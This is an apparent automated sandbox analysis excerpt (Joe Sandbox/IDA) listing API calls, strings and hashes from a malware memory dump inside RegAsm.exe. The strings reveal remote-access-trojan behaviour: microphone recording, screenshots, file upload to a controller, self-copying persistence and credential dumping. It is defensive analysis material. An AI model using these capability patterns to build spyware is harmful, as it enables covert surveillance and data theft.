                                                                                                        • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                                                        • Opcode Fuzzy Hash: 2ee98ea0d0f3863be26643997f5fff8c6a28cb97601397e967d1afa7fe61d675
                                                                                                        • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                                                        APIs
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                        • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                        • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                          • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                        • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                                        • API String ID: 2649220323-436679193
                                                                                                        • Opcode ID: 5423d87cc751ed5cfd1d4c8b3581599aeeb643011f75056a7ca0d89747c9c64e
                                                                                                        • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                                                        • Opcode Fuzzy Hash: 5423d87cc751ed5cfd1d4c8b3581599aeeb643011f75056a7ca0d89747c9c64e
                                                                                                        • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                                        APIs
                                                                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                                        • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                                        • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                        • API String ID: 738084811-2094122233
                                                                                                        • Opcode ID: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                                                                        • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                                        • Opcode Fuzzy Hash: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                                                                        • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                                        • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                                        • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                                        • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Write$Create
                                                                                                        • String ID: RIFF$WAVE$data$fmt
                                                                                                        • API String ID: 1602526932-4212202414
                                                                                                        • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                        • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                                        • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                        • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                        • API String ID: 1646373207-255920310
                                                                                                        • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                        • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                                        • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                        • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 0040CE42
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                        • CopyFileW.KERNEL32 ref: 0040CF0B
                                                                                                        • _wcslen.LIBCMT ref: 0040CF21
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                        • CopyFileW.KERNEL32 ref: 0040CFBF
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                        • _wcslen.LIBCMT ref: 0040D001
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                        • CloseHandle.KERNEL32 ref: 0040D068
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                        • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                        • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                                                        • API String ID: 1579085052-2309681474
                                                                                                        • Opcode ID: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                                                                        • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                                                        • Opcode Fuzzy Hash: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                                                                        • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                                        • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                                        • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                                        • _wcslen.LIBCMT ref: 0041C1CC
                                                                                                        • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                        • GetLastError.KERNEL32 ref: 0041C204
                                                                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                        • GetLastError.KERNEL32 ref: 0041C261
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                        • String ID: ?
                                                                                                        • API String ID: 3941738427-1684325040
                                                                                                        • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                        • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                        • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                        • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                          • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63A01986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                        • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                                        • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                                        • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                                        • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                                        • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                                        • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                                        • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                                        • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                        • String ID: /stext "$0TG$0TG$NG$NG
                                                                                                        • API String ID: 1223786279-2576077980
                                                                                                        • Opcode ID: 1f443aa002b253e2ca7fda76eea7f2872eff987373b47d9eacf61689b8ce9905
                                                                                                        • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                                        • Opcode Fuzzy Hash: 1f443aa002b253e2ca7fda76eea7f2872eff987373b47d9eacf61689b8ce9905
                                                                                                        • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$EnvironmentVariable
                                                                                                        • String ID:
                                                                                                        • API String ID: 1464849758-0
                                                                                                        • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                        • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                                        • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                        • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnumOpen
                                                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                        • API String ID: 1332880857-3714951968
                                                                                                        • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                        • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                                                        • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                        • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                                                        APIs
                                                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                        • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                        • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                                        • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                        • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                        • String ID: Close
                                                                                                        • API String ID: 1657328048-3535843008
                                                                                                        • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                        • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                                        • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                        • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$Info
                                                                                                        • String ID:
                                                                                                        • API String ID: 2509303402-0
                                                                                                        • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                        • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                        • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                        • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                        • __aulldiv.LIBCMT ref: 00408D88
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                        • API String ID: 3086580692-2582957567
                                                                                                        • Opcode ID: 4f195d3c0c62a6e45262181e9b7fb43f1a1b55c9fe98746a0176ab88057bb64b
                                                                                                        • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                                        • Opcode Fuzzy Hash: 4f195d3c0c62a6e45262181e9b7fb43f1a1b55c9fe98746a0176ab88057bb64b
                                                                                                        • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                                        APIs
                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                        • _free.LIBCMT ref: 0045137F
                                                                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                        • _free.LIBCMT ref: 004513A1
                                                                                                        • _free.LIBCMT ref: 004513B6
                                                                                                        • _free.LIBCMT ref: 004513C1
                                                                                                        • _free.LIBCMT ref: 004513E3
                                                                                                        • _free.LIBCMT ref: 004513F6
                                                                                                        • _free.LIBCMT ref: 00451404
                                                                                                        • _free.LIBCMT ref: 0045140F
                                                                                                        • _free.LIBCMT ref: 00451447
                                                                                                        • _free.LIBCMT ref: 0045144E
                                                                                                        • _free.LIBCMT ref: 0045146B
                                                                                                        • _free.LIBCMT ref: 00451483
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                        • String ID:
                                                                                                        • API String ID: 161543041-0
                                                                                                        • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                        • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                        • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                        • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                        APIs
                                                                                                        • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                        • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                                        • API String ID: 489098229-1431523004
                                                                                                        • Opcode ID: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                                                                        • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                                        • Opcode Fuzzy Hash: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                                                                        • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                          • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                          • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                          • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32 ref: 00413768
                                                                                                          • Part of subcall function 00413733: RegCloseKey.ADVAPI32(00000000), ref: 00413773
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                                        • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
